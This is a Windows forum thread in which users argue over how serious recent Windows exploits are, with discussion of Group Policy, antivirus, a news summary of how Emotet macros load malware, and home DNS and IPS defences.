Official Windows 10 Thread

PP Mguire

Build Guru
Messages
31,731
Location
Fort Worth, Texas
Ohhh that one's good but anybody noticing a big pattern since 2017? All these big "exploits" and "vulnerabilities" require system level and physical access to the machine.
Edit: This one is probably the biggest one I've seen out of everything else. A company with a poor GPO policy will get screwed by this if the users are smart enough.
 

Joe C

Fully Optimized
Messages
4,499
Location
Great Lakes State
I do not agree fully..... Any employee that opens a word attachment with a malicious macro or that even clicks on a malicious web site will allow another third party access to a pc. From there they can get account keys and admin privileges. This is how ransomware currently spreads through a business network.
Also.... I have read instances where malicious actors attempt to lure employees with large financial gains too.
 
Last edited:

PP Mguire

Build Guru
Messages
31,731
Location
Fort Worth, Texas
I do not agree fully..... Any employee that opens a word attachment with a malicious macro or that even clicks on a malicious web site will allow another third party access to a pc. From there they can get account keys and admin privileges. This is how ransomware currently spreads through a business network.
Also.... I have read instances where malicious actors attempt to lure employees with large financial gains too.
Yes but this requires an exe or bat file to be opened within a cmd prompt. This should be blocked by GPO or caught by AV from a business IT perspective. A company with a poor GPO well a smart user that knows how to use this will definitely use it. Either for nefarious purposes or not.
Much like all the other crap vulnerabilities and exploits that were talked about the past 5 years this requires a level of physical access and aptitude that can simply be blocked without 10-20% of performance reduced by so called mitigations.

Take for example a lot of blocks put in place by company policy. If GPO allowed such an instance I could use something like this to grant myself admin and remove a lot of monitoring and blocks on a system level. Then change DNS, etc to remove blocks on a network level.
 

Joe C

Fully Optimized
Messages
4,499
Location
Great Lakes State
Read in it's entirety here:
https://www.bleepingcomputer.com/ne...t-spam-campaigns-hitting-mailboxes-worldwide/
However, once you click on these buttons, malicious macros will be enabled that launch a PowerShell command to download the Emotet loader DLL from a compromised WordPress site and save it to the C:\ProgramData folder. Once downloaded, the DLL will be launched using C:\Windows\SysWo64\rundll32.exe, which will copy the DLL to a random folder under %LocalAppData% and then reruns the DLL from that folder.
This is only one of several ways that malicious actors access corporate networks for running ransomeware
If any anti-viruses could catch these things then you would not be seeing so many ransomware attacks affecting so many major corporations.
 

PP Mguire

Build Guru
Messages
31,731
Location
Fort Worth, Texas
That's the thing, a good GPO wouldn't allow that save since it requires admin priv to access User, Windows, ProgamData, Program Files, and Program Files (x86). Kinda like the first thing you linked which is using an exe to grant system level priv, the exe would be wiped being malicious or blocked from download. Both require system level access or a weak GPO. I'm relatively an amatuer when it comes to group policy creation admittedly and I had my kids machines locked down under my own domain and AD in my own house. I tried everything I could think of as my work arounds to my own setup on their machines and nothing worked. My own DNS policies blocked the rest. I'd hope experienced admins working large networks could muster this, as at Lockheed I couldn't do squat once they ditched Jira and went with a good GPO. Relying totally on systems like Jira means you're only blocking things that require admin which there definitely are workarounds for. Locking profiles down by group policy and local access is a different ball park. Mind you, I did AD, domain, and DNS at my own house spun up from scratch simply as education to further my career. Only took me a couple hours and pros should be able to do it in their sleep, especially 6 figure salaried pros.

A secondary preventative measure is a good IPS and honeypot. That previous situation was just an experiment for education, but for regular use I use OpenDNS to block what I don't want my kids getting to on top of group based blocks provided by Ubiquiti. I have my kids VLAN operating under a Honeypot and it along with IPS blocks a lot of localized malicious content that finds its way through DNS blocks. Like stupid Robux surveys.
 
Top Bottom